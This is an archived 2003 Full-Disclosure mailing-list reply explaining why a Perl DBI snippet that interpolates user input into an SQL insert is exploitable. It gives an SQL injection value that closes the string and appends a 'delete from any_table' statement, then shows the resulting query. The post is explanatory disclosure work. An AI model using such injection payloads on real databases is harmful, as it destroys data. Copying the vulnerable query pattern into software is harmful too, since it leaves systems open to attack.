[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] Question: is this exploitable?
- To: Paulo Pereira <pjp@paulo-pereira.net>
- Subject: Re: [Full-Disclosure] Question: is this exploitable?
- From: "Jonathan A. Zdziarski" <jonathan@nuclearelephant.com>
- Date: Sat, 18 Oct 2003 09:18:14 -0400
> $sth = $dbh->prepare("insert into projects
> values(null,\"$project\")");
$project = qq!"); delete from any_table where value in("!;
executes:
insert into projects values(null, ""); delete from any_table where value
in("");
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html